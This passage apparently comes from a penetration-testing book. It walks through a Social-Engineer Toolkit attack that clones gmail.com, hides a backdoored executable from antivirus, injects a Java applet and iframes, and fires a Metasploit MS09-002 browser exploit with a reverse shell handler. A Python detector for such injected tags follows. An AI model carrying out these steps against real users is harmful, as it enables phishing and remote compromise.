The Social-Engineer Toolkit
Enter your choice (enter for default):
[-] Enter the PORT of the listener (enter for default):
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit executable.
********************************************************
Do you want to create a Linux/OSX reverse_tcp payload
in the Java Applet attack as well?
********************************************************
Enter choice yes or no:
no
Enter the browser exploit you would like to use
8. Internet Explorer 7 Uninitialized Memory Corruption (MS09-002)
Enter your choice (1-12) (enter for default):
8
[*] Cloning the website: https://gmail.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: x5sKAzS
[*] Malicious java applet website prepped for deployment
[*] Injecting iframes into cloned website for MSF Attack....
[*] Malicious iframe injection successful...crafting payload.
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(ms09_002_memory_corruption) >
[*] Started reverse handler on 172.16.32.129:443
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://172.16.32.129:8080/
[*] Server started.
To complete the attack setup, select the default reverse Meterpreter
payload along with default encoding and listening port. Choose not to
configure a Linux and OS X payload, and then set the browser exploit to
Internet Explorer 7 Uninitialized Memory Corruption (MS09-002); then SET
will launch the attack.
Once everything is running, you can browse to the website and see what’s
going on there. A message URL tells you that the site has been moved. Please
refer to Figure 10-4 to see what the target will see on his machine.
Click the link and the Metasploit exploit begins. Here’s the handler on
the backend:
[*] Sending Internet Explorer 7 CFunctionPointer Uninitialized Memory
Corruption to 172.16.32.131:1329...
This exploit fails, because we are using Internet Explorer 6. The target’s
screen is shown in Figure 10-6.
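
A defender-side check for the two changes the SET output above reports making to the cloned page (an injected Java applet and injected iframes), as an added example that is not from the book or from SET. The sample HTML is constructed, the heuristics are assumptions about what a reviewer would flag, and the names `iframe_reasons`, `InjectionAudit` and `audit` are hypothetical.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import ipaddress

# Constructed sample page (illustrative markup, not SET's literal output):
# one ordinary iframe, one applet, one hidden iframe to an IP on port 8080.
SAMPLE_PAGE = """<html><body>
<form action="/login" method="post"><input name="user"></form>
<iframe src="https://accounts.example.com/help" width="400" height="300"></iframe>
<applet code="Update.class" archive="applet.jar" width="1" height="1"></applet>
<iframe src="http://172.16.32.129:8080/" width="0" height="0"></iframe>
</body></html>"""

def iframe_reasons(a):
    """Return the heuristics (assumed rules) that an iframe's attributes trip."""
    reasons = []
    url = urlparse(a.get("src", ""))
    style = a.get("style", "").replace(" ", "").lower()
    if a.get("width") in ("0", "1") or a.get("height") in ("0", "1") or "display:none" in style:
        reasons.append("hidden frame")
    try:
        ipaddress.ip_address(url.hostname or "")
        reasons.append("raw IP host")
    except ValueError:
        pass  # host is a DNS name (or missing), not an IP literal
    if url.port not in (None, 80, 443):
        reasons.append("non-standard port")
    return reasons

class InjectionAudit(HTMLParser):
    """Collect (tag, reasons, source) for plugin tags and suspicious iframes."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag in ("applet", "object", "embed"):
            src = a.get("archive") or a.get("data") or a.get("src", "")
            self.findings.append((tag, "plugin content", src))
        elif tag == "iframe":
            reasons = iframe_reasons(a)
            if reasons:
                self.findings.append((tag, ", ".join(reasons), a.get("src", "")))

def audit(html):
    parser = InjectionAudit()
    parser.feed(html)
    return parser.findings
```

Run over pages captured by a web proxy or mail gateway, the findings give a reviewer the tag, the reason it was flagged and the address it points to; the ordinary help iframe in the sample is not reported.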